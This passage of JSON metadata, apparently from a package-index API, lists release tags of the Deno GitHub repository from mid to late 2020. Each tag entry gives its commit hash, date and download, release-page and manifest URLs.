deno/releases/tag/std/0.83.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.83.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0/manifests"},{"name":"v1.6.2","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2/manifests"},{"name":"std/0.82.0","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.82.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.82.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.82.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0/manifests"},{"name":"v1.6.1","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1/manifests"},{"name":"std/0.81.0","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.81.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.81.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.81.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0/manifests"},{"name":"v1.6.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0/manifests"},{"name":"std/0.80.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.80.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.80.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.80.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0/manifests"},{"name":"v1.5.4","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4/manifests"},{"name":"std/0.79.0","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.79.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.79.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.79.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0/manifests"},{"name":"v1.5.3","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3/manifests"},{"name":"std/0.78.0","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.78.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.78.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.78.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0/manifests"},{"name":"v1.5.2","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2/manifests"},{"name":"std/0.77.0","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.77.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.77.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.77.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0/manifests"},{"name":"v1.5.1","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1/manifests"},{"name":"std/0.76.0","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.76.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.76.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.76.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0/manifests"},{"name":"v1.5.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0/manifests"},{"name":"std/0.75.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.75.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.75.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.75.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0/manifests"},{"name":"v1.4.6","sha":"9e9ec9784a639ef7205e1e303301ee558439b045","kind":"commit","published_at":"2020-10-10T10:30:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6/manifests"},{"name":"v1.4.5","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5/manifests"},{"name":"std/0.74.0","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.74.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.74.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.74.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0/manifests"},{"name":"v1.4.4","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4/manifests"},{"name":"std/0.73.0","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.73.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.73.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.73.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0/manifests"},{"name":"v1.4.3","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3/manifests"},{"name":"std/0.72.0","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.72.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.72.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.72.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0/manifests"},{"name":"v1.4.2","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2/manifests"},{"name":"std/0.71.0","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.71.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.71.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.71.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0/manifests"},{"name":"v1.4.1","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:40:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1/manifests"},{"name":"std/0.70.0","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:38:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.70.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.70.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.70.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0/manifests"},{"name":"v1.4.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0/manifests"},{"name":"std/0.69.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.69.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.69.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.69.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0/manifests"},{"name":"v1.3.3","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3/manifests"},{"name":"std/0.68.0","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.68.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.68.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.68.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0/manifests"},{"name":"v1.3.2","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2/manifests"},{"name":"std/0.67.0","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.67.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.67.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.67.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0/manifests"},{"name":"v1.3.1","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1/manifests"},{"name":"std/0.66.0","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.66.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.66.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.66.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0/manifests"},{"name":"v1.3.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0/manifests"},{"name":"std/0.65.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.65.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.65.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.65.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0/manifests"},{"name":"v1.2.3","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3/manifests"},{"name":"std/0.64.0","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.64.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.64.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.64.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0/manifests"},{"name":"v1.2.2","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2/manifests"},{"name":"std/0.63.0","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.63.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.63.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.63.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0/manifests"},{"name":"v1.2.1","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1/manifests"},{"name":"std/0.62.0","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.62.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.62.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.62.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0/manifests"},{"name":"v1.2.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0/manifests"},{"name":"std/0.61.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.61.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.61.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.61.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0/manifests"},{"name":"v1.1.3","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3/manifests"},{"name":"std/0.60.0","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.60.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.60.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.60.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/